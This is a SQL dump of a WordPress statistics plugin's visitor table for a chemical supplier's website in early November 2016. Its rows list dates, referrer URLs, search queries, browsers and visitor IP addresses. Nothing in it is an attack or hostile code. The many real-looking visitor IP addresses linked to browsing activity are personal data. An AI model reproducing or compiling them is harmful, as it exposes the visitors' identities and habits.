INSERT INTO `wp_statistics_visitor` VALUES (14609, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14610, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14611, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14612, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '9.54.55.81', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14613, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '51.0.2704.106', '', '185.29.9.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14614, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '138.162.0.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14615, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '138.162.0.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14616, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.70.48.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14617, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '132.210.85.154', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14618, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.101.173.70', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14619, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '134.216.88.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14620, '2016-11-01', 'https://mfg.regionaldirectory.us/chemicals/illinois.htm', 'Chrome', 'Windows', '54.0.2840.71', '', '198.54.107.194', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14621, '2016-11-01', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '74.12.64.111', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14622, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Android', '41.0', '', '174.218.139.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14623, '2016-11-01', 'https://www.bing.com/search?q=tfe%20release%20agent%2Fdry%20lubricant&qs=n&form=QBRE&pq=tfe%20release%20agent%2Fdry%20lubricant&sc=0-31&sp=-1&sk=&cvid=4A90DDB3C7134BC2AE49CC8F1E6A23DC', 'MSIE', 'Windows', '11.0', '', '192.138.178.121', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14624, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiiyN7WpIjQAhWIPYEKHTuOANkYABAA&sig=AOD64_0eTkkaoLk9mVjZRTSqfVUKCJpXrg&rct=j&q=&ved=0ahUKEwiAwtjWpIjQAhUI4SYKHZaCBGsQ0QwIigE&adurl=', 'MSIE', 'Windows', '11.0', '', '208.42.251.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14625, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwiJ_rjYpIjQAhVJ8IMKHSE_DnEQFghnMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&sig2=yySWy7rGMqLNDxcLvZ2YgQ', 'MSIE', 'Windows', '11.0', '', '4.31.122.2', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14626, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14627, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjFx8mkp4jQAhUM3GMKHWuEACkQFgg1MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '128.170.224.10', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14628, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14629, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwid1dXrp4jQAhVIHYEKHRHsBVkYABAG&ei=kO8YWOaGFcHTmwG-q4iICA&sig=AOD64_3CQbTmomo0WT-dC-7e5QlgjJRvvg&rct=j&q=&sqi=2&ved=0ahUKEwjmjtHrp4jQAhXB6SYKHb4VAoEQ0QwIKw&adurl=', 'MSIE', 'Windows', '11.0', '', '24.151.0.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14630, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj-jePjqIjQAhWSYH4KHdxDBUAYABAA&sig=AOD64_3uq1R065qVR4Tvw9Wx8M1-OWECaw&rct=j&q=&ved=0ahUKEwiI_9_jqIjQAhWIg1QKHb-EDWIQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '192.188.123.5', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14631, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '96.88.44.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14632, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14633, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.34.208.190', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14634, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj14pbzqYjQAhVCG4EKHXf6CNcYABAA&sig=AOD64_3Qph7rBZMCLP5roou7hPziqk2wlw&rct=j&q=&ved=0ahUKEwjpuJPzqYjQAhXB4yYKHYF7ClsQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '192.249.47.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14635, '2016-11-01', 'https://www.adsensecustomsearchads.com/', 'Firefox', 'Windows', '49.0', '', '73.183.160.187', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14636, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '45.58.85.48', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14637, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14638, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '71.254.189.75', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14639, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.183.80.218', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14640, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwjKnNbrrojQAhVBcBoKHQafBrwQjBAIIzAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.137132246,d.d2s', 'MSIE', 'Windows', '10.0', '', '10.160.209.10', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14641, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.173.64.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14642, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '193.18.60.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14643, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14644, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '99.195.115.211', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14645, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0ahUKEwjqttGjsIjQAhVC6yYKHdkiDmw4FBAWCFAwCQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvertrel-mca%2F&usg=AFQjCNEn7XKmhJNqkvKwcWqVCR7ahXxqZA', 'MSIE', 'Windows', '11.0', '', '12.15.85.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14646, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '97.34.192.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14647, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwi39NL3s4jQAhXo6oMKHfoFAawQFgggMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fmold-release-agents%2F&usg=AFQjCNHhgyC2pnZej0928BNtU-741d08wg&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '207.239.67.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14648, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14649, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '171.66.208.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14650, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwic1ZSKt4jQAhVjq1QKHVfhB4MQFghEMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-64-radical-initiator%2F&usg=AFQjCNFSn_9whraBhhuvpb2uyL5Gz7-R8Q', 'MSIE', 'Windows', '11.0', '', '192.168.205.88', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14651, '2016-11-01', 'https://www.miller-stephenson.com/miller/buscador.php?palabra=MS-381HCM&buscador=+', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14652, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14653, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14654, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjp2svbuojQAhWDXiYKHY4JB04QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2Fheloxyepoxy-functional-modifiers%2F&usg=AFQjCNGDY65IP1zGWGauwOd17_2fWSdfRQ', 'MSIE', 'Windows', '11.0', '', '192.28.0.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14655, '2016-11-01', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiDmPHiuojQAhXK6YMKHQ5qCWwQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA', 'MSIE', 'Windows', '11.0', '', '10.1.10.14', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14656, '2016-11-01', 'https://www.google.com/', 'Safari', 'iPhone', '600.1.4', '', '104.183.124.45', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14657, '2016-11-01', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.216.157.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14658, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.211.22.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14659, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2272.89', '', '10.74.196.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14660, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '104.183.124.45', '000', 144, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14661, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '104.183.124.45', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14662, '2016-11-01', 'https://www.bing.com/search?q=Miller+Stephenson+SDS&FORM=R5FD', 'MSIE', 'Windows', '11.0', '', '204.28.14.161', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14663, '2016-11-01', 'https://aktivator-windows10.blogspot.com/', 'MSIE', 'Windows', '5.5', '', '178.137.95.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14664, '2016-11-01', 'https://google.com', 'Firefox', 'Windows', '49.0', '', '93.221.200.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14665, '2016-11-01', 'https://www.bing.com/search?q=Miller-Stephenson+solvents&go=Submit&qs=n&form=QBLH&pq=miller-stephenson+solv&sc=0-22&sp=-1&sk=&cvid=66CC15B5E48347678AFA059E3262E9F9', 'Chrome', 'Windows', '53.0.2785.143', '', '199.64.7.56', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14666, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '209.237.124.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14667, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.101.188.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14668, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.122.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14669, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '69.92.141.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14670, '2016-11-01', 'https://www.bing.com/search?q=miller-stephenson&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '206.190.75.9', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14671, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '207.181.211.168', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14672, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '6.2.8', '', '99.244.8.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14673, '2016-11-01', 'https://www.google.ca/', 'Safari', 'Macintosh', '10.0.1', '', '128.189.196.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14674, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '171.66.208.134', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14675, '2016-11-01', 'https://balkanfarma.ru/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14676, '2016-11-01', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '50.27.209.173', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14677, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '99.232.8.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14678, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '184.177.74.76', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14679, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '174.209.6.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14680, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14681, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.4.244.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14682, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14683, '2016-11-01', 'https://www.adsensecustomsearchads.com/', 'Safari', 'iPad', '9.0', '', '73.38.135.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14684, '2016-11-01', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '32.0', '', '151.237.184.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14685, '2016-11-01', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '151.237.184.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14686, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '24.193.212.151', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14687, '2016-11-01', 'https://www.google.com/aclk?sa=L&ai=DChcSEwibg4q024jQAhUTG4EKHdOCBH4YABAA&sig=AOD64_3R8G5yEU20oUPU6tvCq0vhzVfa5Q&rct=j&q=&ved=0ahUKEwjO2Ya024jQAhXC4SYKHdpPCC8Q0QwIHQ&adurl=', 'MSIE', 'Windows', '11.0', '', '144.9.40.131', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14688, '2016-11-01', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.71', '', '95.12.116.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14689, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '72.145.48.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14690, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '128.49.249.216', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14691, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Android', '50.0.2661.89', '', '166.182.80.59', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14692, '2016-11-02', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14693, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14694, '2016-11-02', 'https://www.google.com.hk/', 'Chrome', 'Windows', '53.0.2785.143', '', '121.12.146.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14695, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14696, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.96.10.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14697, '2016-11-02', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&cad=rja&uact=8&ved=0ahUKEwjAmc_f5YjQAhULe7wKHRkoChE4HhAWCFEwCA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fhigh-temperature-release-agent%2F&usg=AFQjCNHHCcdn85xDot1NOj4aRDSagxE8cg&bvm=bv.137132246,d.dGc', 'MSIE', 'Windows', '11.0', '', '118.34.131.33', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14698, '2016-11-02', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.94.31.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14699, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14700, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.247.50.53', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14701, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '73.93.154.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14702, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '210.61.39.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14703, '2016-11-02', 'https://www.google.com.tw/', 'Chrome', 'Windows', '54.0.2840.71', '', '210.61.39.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14704, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '218.92.147.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14705, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '104.237.242.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14706, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '104.237.242.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14707, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '123.235.199.60', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14708, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '73.38.135.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14709, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 120, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14710, '2016-11-02', 'miller-stephenson.com:80', 'Unknown', 'Unknown', 'Unknown', '', '185.2.101.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14711, '2016-11-02', 'google.com', 'Chrome', 'Windows', '20.0.1092.0', '', '185.2.101.211', '000', 69, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14712, '2016-11-02', 'https://sucuri.net', 'MSIE', 'Windows', '8.0', '', '173.255.233.124', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14713, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '134.216.26.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14714, '2016-11-02', 'https://www.miller-stephenson.com', 'Ipad', 'Unknown', 'Unknown', '', '173.255.233.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14715, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '4.0', '', '173.255.233.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14716, '2016-11-02', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '3.1.2', '', '173.255.233.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14717, '2016-11-02', 'https://www.facebook.com/', 'Chrome', 'Windows', '17.0.963.79', '', '173.255.233.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14718, '2016-11-02', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.16', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14719, '2016-11-02', 'https://search.yahoo.co.jp/search?fr=slv1-tospcb4&p=miller-stephenson%20gpl200-207&ei=UTF-8', 'MSIE', 'Windows', '11.0', '', '118.163.112.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14720, '2016-11-02', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Windows', '537.36', '', '185.2.101.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14721, '2016-11-02', 'https://www.google.tt/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwjnj_X4hYnQAhWM3oMKHUdEBYEQFgggMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '200.1.110.50', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14722, '2016-11-02', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14723, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.156.148.151', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14724, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14725, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14726, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.170.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14727, '2016-11-02', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14728, '2016-11-02', 'https://www.google.com.au/', 'Chrome', 'Windows', '54.0.2840.71', '', '120.151.215.190', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14729, '2016-11-02', 'https://dnepropetrovsk.mistr-x.org/', 'Opera', 'Windows', '9.0', '', '178.137.86.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14730, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '125.168.115.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14731, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '162.234.161.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14732, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '109.11.48.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14733, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '14.192.26.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14734, '2016-11-02', 'https://search.yahoo.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '143.248.13.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14735, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14736, '2016-11-02', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '115.178.217.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14737, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '203.6.77.2', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14738, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.6.77.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14739, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'iPad', '47.0.2526.107', '', '174.3.59.192', '000', 1, 0); 
